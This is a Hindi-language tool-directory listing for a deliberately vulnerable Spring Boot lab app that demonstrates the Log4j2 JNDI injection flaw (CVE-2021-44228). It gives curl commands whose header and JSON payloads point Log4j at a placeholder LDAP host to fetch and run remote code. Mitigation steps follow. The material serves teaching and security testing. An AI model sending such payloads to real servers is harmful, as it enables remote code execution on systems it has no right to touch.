Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j2-CVE-2021-44228 — कमजोर Spring Boot वेब एप्लिकेशन जो Log4j2 JNDI इंजेक्शन (CVE-2021-44228) प्रदर्शित करता है, जिसमें शोषण चरण और सुरक्षा परीक्षण और शिक्षा के लिए शमन मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/pravin-pp/log4j2-cve-2021-44228
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubpravin-pp/log4j2-cve-2021-44228

log4j2-CVE-2021-44228

कमजोर Spring Boot वेब एप्लिकेशन जो Log4j2 JNDI इंजेक्शन (CVE-2021-44228) प्रदर्शित करता है, जिसमें शोषण चरण और सुरक्षा परीक्षण और शिक्षा के लिए शमन मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
114 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Sample Log4j2 vulnerable application (CVE-2021-44228)

प्रभावित संस्करण: 2.0-beta9 से 2.14.1 तक के सभी संस्करण

यह एप्लिकेशन Spring Boot वेब एप्लिकेशन पर आधारित है जो CVE-2021-44228 के प्रति संवेदनशील है

यह Log4j 2.14.1 का उपयोग करता है (spring-boot-starter-log4j2 2.6.1 के माध्यम से)।

एप्लिकेशन चलाना

इसे चलाएँ:

root@kitploit:~
Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

शोषण के चरण

  • फिर, exploit को निम्न का उपयोग करके ट्रिगर करें:
root@kitploit:~
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/efdgt62jjd0002leee=}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addemployee' \
--header 'Content-Type: application/json' \
--data '{
	"name": "${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}"
}'
  • आउटपुट पर ध्यान दें, जो दर्शाता है कि यह दुर्भावनापूर्ण LDAP सर्वर से कनेक्ट हो रहा है:
root@kitploit:~
021-12-12 12:17:00,579 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=]. javax.naming.CommunicationException: your-private-ip:1389 [Root exception is java.net.UnknownHostException: your-private-ip]


Caused by: java.net.UnknownHostException: your-private-ip
  • यदि आप वास्तविक ldap सर्वर विवरण देते हैं, तो यह ऑब्जेक्ट डाउनलोड करेगा और इसे आपके java प्रोग्राम में निष्पादित करेगा

यह कमजोरी सभी सर्वरों को प्रभावित करती है, जिसमें क्लाइंट-फेसिंग और बैकएंड कोर सिस्टम दोनों शामिल हैं, यदि आपका एप्लिकेशन अमान्य डेटा का लॉग संदेश प्रिंट कर रहा है..

  • उदाहरण के लिए, exploit वाली User-Agent स्ट्रिंग को Java में लिखे बैकएंड सिस्टम को पास किया जा सकता है जो इंडेक्सिंग या डेटा साइंस करता है और exploit लॉग हो सकता है। यही कारण है कि Log4j संस्करण 2 का उपयोग करने वाले सभी Java-आधारित सॉफ़्टवेयर को तुरंत पैच किया जाना या उन पर mitigations लागू करना अत्यंत आवश्यक है। यहां तक कि अगर इंटरनेट-फेसिंग सॉफ़्टवेयर Java में नहीं लिखा गया है, तो संभव है कि स्ट्रिंग्स अन्य Java सिस्टम में पास हो जाएं जिससे exploit हो सकता है।

शमन :

संदर्भ : https://logging.apache.org/log4j/2.x/security.html

  • एप्लिकेशन का त्वरित हॉट फिक्स -> 2.10 से अधिक या बराबर रिलीज़ में, इस व्यवहार को सिस्टम प्रॉपर्टी log4j2.formatMsgNoLookups या पर्यावरण चर LOG4J_FORMAT_MSG_NO_LOOKUPS को true पर सेट करके कम किया जा सकता है। 2.0-beta9 से 2.10.0 तक की रिलीज़ के लिए, JndiLookup क्लास को classpath से हटाना है: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class।

  • एप्लिकेशन में log4j 2.15.0 में अपग्रेड करें और डिप्लॉय करें

टूल डाउनलोड करें